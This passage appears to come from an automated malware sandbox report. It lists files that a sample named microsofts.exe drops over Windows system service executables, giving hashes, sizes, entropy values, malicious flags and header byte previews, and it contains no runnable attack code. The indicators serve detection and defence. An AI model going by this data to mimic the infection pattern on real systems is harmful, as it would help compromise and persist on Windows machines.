                                                                                                                                                                                                                                                                                                          SSDEEP:48:lzN/KIiTi1mYPPP6d/nUjhPcPWP7PMwQLsMlPm/EIaxsii:r/KIH6FnCVE8
                                                                                                                                                                                                                                                                                                          MD5:2CA907CC00702B576B47492C0E97287C
                                                                                                                                                                                                                                                                                                          SHA1:6B3E53A64264E05989FE368383B76E1B777B4443
                                                                                                                                                                                                                                                                                                          SHA-256:C8D9B13308056EB040938DED1C38E11505A6262FD50131999A44FD9BD1AE0096
                                                                                                                                                                                                                                                                                                          SHA-512:E0DF0F02ACE15AA30E3D01D6273D7C74C5642730BAA5B7A83CC8870813FFCFEE644790E52B2A82830BCB321F4AB59AA67280FAD7DE337AD1BF4A16E4A683B84E
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:.(..@...@...........................................!...................................hcC..............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............5..~............W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.........hcC.................................................................8.B.hcC.....19041.1.amd64fre.vb_release.191206-1406.....,.@.hcC................'"a.-....spp.pdb...........@.hcC......T.c..i.\.C.s"8@....vssvc.pdb......./.@.hcC.....W.p.D.......]....vssapi.pdb......-.@.hcC......\..Q....T*&.......udfs.pdb........0.@.hcC.......B..,`..9..4.....ifsutil.pdb.....-.@.hcC.....I:...S%9.`...'.R....uudf.pdb........1.@.hcC............1$OI"......wbengine.pdb................................

                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1150976
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0389062401643905
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:wfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wfsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:AFAD48DC29F1CF4A38DCFFCDB37F8BA9
                                                                                                                                                                                                                                                                                                          SHA1:C46F4029DB332F2FC91B836C2DC2EEFBDF500984
                                                                                                                                                                                                                                                                                                          SHA-256:65FCF69964D2046F10F4E2F73B613A31F7B73DC5A14140BDC6B712A4221CB25C
                                                                                                                                                                                                                                                                                                          SHA-512:36958FD64A30F0F35430AE1EF0443062195A0444570F5812A5CE78EA7898E35ADCB7D2D9B5BF886C970A31BEBCD4CABAF18A8877327B6CA75DE3FE3A125A0095
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................7............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\AgentService.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1801216
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.974307273085415
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:0wVFr68Vw9wn/6h8N1zidKDmg27RnWGj:0wVFrssC/dKD527BWG
                                                                                                                                                                                                                                                                                                          MD5:FB45B515238278E8D72072D18DD7382C
                                                                                                                                                                                                                                                                                                          SHA1:5BDB41671A9CE2F3721C198C0E19432F29E21213
                                                                                                                                                                                                                                                                                                          SHA-256:F1C2E6C7A37B1D5FE15C8E1A61970D2085C996D27052751506018F1262A65229
                                                                                                                                                                                                                                                                                                          SHA-512:DE2D58C0B27F9F5EF0EB5708C00384572A062F9E585651682C30E4840165AB8D7BBAD5F5B71018A3410310FBC0C9EDF76C49105C378261AB0476B840533EF636
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1348608
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.253748339903475
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:EQW4qoNUgslKNX0Ip0MgHCpoMBOuHsqjnhMgeiCl7G0nehbGZpbD:EQW9BKNX0IPgiKMBOubDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:5308671F56D4A4A4CDF6FF841AEF1780
                                                                                                                                                                                                                                                                                                          SHA1:8F6D00BFA28B257898BE9C5051ACE28942FE1C4C
                                                                                                                                                                                                                                                                                                          SHA-256:6157B2215F1E459623A76DD6FF586411BD34D3E3DAAC64FBFE88A8EE09BC4365
                                                                                                                                                                                                                                                                                                          SHA-512:DDA90AD49B0BEF58A6E31D5670B45A0CE3EB950FE350C9EF3E3C8610400E9DF4BAC84FD70319F51191F7290DAF8D2CE6EBD6BF20D49074C3FD395CE01C4E7DB4
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1224192
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.163541831978704
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:A2G7AbHjkwsqjnhMgeiCl7G0nehbGZpbD:A2G7AbHj5Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:88D15FF7E7C96A178FAC1EC2E9DFAB23
                                                                                                                                                                                                                                                                                                          SHA1:4FB2517FB1A9CADCA83630C9C3C5A0B26529D86E
                                                                                                                                                                                                                                                                                                          SHA-256:4ADF8728ABCC850669E632EBA241F1235ABD76EFEC51596DB983A1C854DF412D
                                                                                                                                                                                                                                                                                                          SHA-512:C12E6C2CF8C14F27FEDD2E230C1F51B291AAE8694217001BFB5251C32A434EF3601CC8C2C9803EF7F0BEBE2A98177596AD6E48DE2294A80385022A9E79F16D55
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................K=.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1242624
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.28891680544639
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:WkdpSI+K3S/GWei+qNv2uG3osqjnhMgeiCl7G0nehbGZpbD:W6SIGGWei2uG3UDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:283D4068FC62E71EA43B248224FAE579
                                                                                                                                                                                                                                                                                                          SHA1:3235D05FEB504FB7155C4CBD4D31813A831919B6
                                                                                                                                                                                                                                                                                                          SHA-256:131A43DE0A9A9553B4ECC09CB50DE50EC308F5929A1D8E297EF6D752742498D6
                                                                                                                                                                                                                                                                                                          SHA-512:7A3099BDE2B5220C7CB7F149DC5F390BC19A35BEE08D4367004ACDE50F42AE9C7822442227C237A7E99A527EA32EDE0A0222CB442104D8813A937112AD1F13E3
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......+..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\Locator.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1141248
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0174977353632935
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:JbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:3A5699061E1911C756244F5DD3EFCD56
                                                                                                                                                                                                                                                                                                          SHA1:70074B95F949A8C0265DDA261A0B1ACD560B5523
                                                                                                                                                                                                                                                                                                          SHA-256:42DA5D5FEB5731E058BACA117605648B44B56E38ACA86F6B7FA7DEB77408891B
                                                                                                                                                                                                                                                                                                          SHA-512:EBF011C020675C72F45228AB8823A75F8E0446FE65BE7FA990DB8D13BC1D4692FF25C29D4EC6FE9D73F6CDC3450A173DF4BB58DA6C58D39476570968AE5C4C7A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.32077789470018403
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:6:51OT8ta/k/uMclF6vMclFq5zzT1p8Oz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GwB:A80kqF69Fq5zzR2v6CzE5Z2+fqjFzZ
                                                                                                                                                                                                                                                                                                          MD5:9F76C8B51793181EF6DCBCD007F8EC88
                                                                                                                                                                                                                                                                                                          SHA1:F08FEBF0A2B2693CA311F1A63A3B60256832D539
                                                                                                                                                                                                                                                                                                          SHA-256:CD15EC465CE6B0299634F9359D0835B1461B37362479CA338527AD6002BE7967
                                                                                                                                                                                                                                                                                                          SHA-512:E449EC923B2B49D7148A49A4A2C76F152B6C21A3ACE5E596D3E781B697F06283C473A5C2FA0F02999B205120C5DE409DD08CB406471E6854AD7D46285B1CE85E
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:.@..X...X.......................................X...!...................................................@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............t.w............M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1511424
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.222899038408326
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:SObHA4LWOsvAYFTAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:DjL3UTAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:03402E65F6A814316E26E0D2EB369ABC
                                                                                                                                                                                                                                                                                                          SHA1:996604B63BB8E22D5B83E2D2EDD62BA4044F85B3
                                                                                                                                                                                                                                                                                                          SHA-256:6487B40BEA3C096F2DFD8094FB2C81563214C518EA639FBF53208C97E4567246
                                                                                                                                                                                                                                                                                                          SHA-512:0EDFB75D65471736AC252BA26C8B0DF89756DE5DC9D5BDF52485E871E0E1095E634CD48A46F06133F126C2D1E8B7A954BA6ADFC633A58C303D38A74EF1CCA4B0
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@....................................6w.... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1235968
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.182186754333678
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:jpFtQO8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eO8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:367BAC61864EA78BE8F89AAEA741C1B2
                                                                                                                                                                                                                                                                                                          SHA1:0C2B4995D738EDFDFA95F06C7EF8B76150ED7D94
                                                                                                                                                                                                                                                                                                          SHA-256:8054165642E11A5B2ABB73261EC3153F2326E3CD3A38144C92B4566752455DC5
                                                                                                                                                                                                                                                                                                          SHA-512:D73D2AAD9B63C01EECEDF3CA88969B1CE2B8BADF05E4FEBF8C0CCA5348A0107BF7A8A6F3213283C1A1D365CE8A1C248CB55592A4710AD7D5C38B6DE00ED15303
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@....................................U^.... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1513984
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.102366509633962
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:B3frCoQItLsiLPLe24CxruW4bIhllAsqjnhMgeiCl7G0nehbGZpbD:B3fzsIPLkCNuVbIhD8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:5433BF918EC0E055F10B17DC543C1E85
                                                                                                                                                                                                                                                                                                          SHA1:CB65149CEF53CB230E4D5C0E2049E70F5E754819
                                                                                                                                                                                                                                                                                                          SHA-256:020D24ADCF464E09C6ACCA27491F29ECE0582630650C5F2ACA1191C1D3AE61DE
                                                                                                                                                                                                                                                                                                          SHA-512:9055E3D7EEEC0C4E3C078A9536CA236E09EAE7989D359012FC3535EB2407B0279389D6C0F69DABE29997A429DA5F3768C48B936C7CCC79EB9B5BF5AEEAEBE8EC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1846784
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.93943164389688
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:PW6BApg2YuyuNDYTabvcRvNYf8km1VsqjnhMgeiCl7G0nehbGZpbD:PF2YuHNETovcvNYf8kmzDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:A30B8B3725152FFD1FEF45C52D3261B8
                                                                                                                                                                                                                                                                                                          SHA1:717C59D7BAB08CCA6D21AE3EC37EA9397C4BA42F
                                                                                                                                                                                                                                                                                                          SHA-256:429D646B7FBF0F8E4617135EEFEA5AB1F66DA903B9542F674A93C0E8A38D545F
                                                                                                                                                                                                                                                                                                          SHA-512:C883885C01805C29380EE4E98A893EBF476BC8451086FE85776CB5DD8697EE75BEA3127DFA47DEA19A75928D7CB7E0B23B0A6F3A54A9E5951538376F9959085E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p......E..... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\Spectrum.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1455616
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.23886611947782
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:6iW6ZvAKF5i/dN9Bdexj9Trk+F8sqjnhMgeiCl7G0nehbGZpbD:6YxF50b9Bdm9TxSDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:2DDE61D6384346F05BA3DA4D78A1740A
                                                                                                                                                                                                                                                                                                          SHA1:32E6AEB21855931103B10D8EF964B5925F12B891
                                                                                                                                                                                                                                                                                                          SHA-256:A828967B9343566B0EA29E5F3D07B5958CE1F26B8B8FD512919EE7DFE2A9FE6E
                                                                                                                                                                                                                                                                                                          SHA-512:253C39E93FA89465B65D9EBB0C22469396E08A35E5CA223EE1D1A0B7C35B3636A709E9C8CA45B83A08266E8351389C37EEE83EFA418C1C57A6FFC078F0DD4547
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@....................................|K.... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1455616
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4765696821894885
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:aJnJ5D3WYRsqjnhMgeiCl7G0nehbGZpbD:aJnJ5DGYlDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:10F8624709D07DA72863BBB00DFD5D16
                                                                                                                                                                                                                                                                                                          SHA1:13BC1B93A66F398F4F037F2FBB24E84C40DEDA35
                                                                                                                                                                                                                                                                                                          SHA-256:3D4D571CFDF2A0ABE18DC5E624D5B8342273528599F4990D671F0F1803AF3389
                                                                                                                                                                                                                                                                                                          SHA-512:951F229682886A467D64EA84A5CBE6563443AA17FA19E2B3AE22F6BBC3A998E460323107E6C49145C92ECF5660F3B32942A68750E1E809CE6365D7A0BCB035F6
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@....................................j..... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\VSSVC.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2075136
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.736556856427155
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:JPK86JYTerDjfJ2313e1mP1MdnUuDmg27RnWGj:cD527BWG
                                                                                                                                                                                                                                                                                                          MD5:6F619B0A7514F05B32A6D786A12B627C
                                                                                                                                                                                                                                                                                                          SHA1:9B1F3637812FBE619085D0B55C213776E0A52AB1
                                                                                                                                                                                                                                                                                                          SHA-256:48756E0A15EAA52327AF4B604B72983AC7A12F10D063DFF97905BB3E743D8A5D
                                                                                                                                                                                                                                                                                                          SHA-512:0D662E9FB72A1389BF11D27E63DBE857C049D899DEBE86AF3947CCF28321F79B2A60DF14830A066F0DD5706C9667BD9A13130D20BC0811ED23E89F04AA81519B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. .....*M ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1225728
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.163302561027
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:wEP3R6NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:L6NsqjnhMgeiCl7G0nehbGZpbD
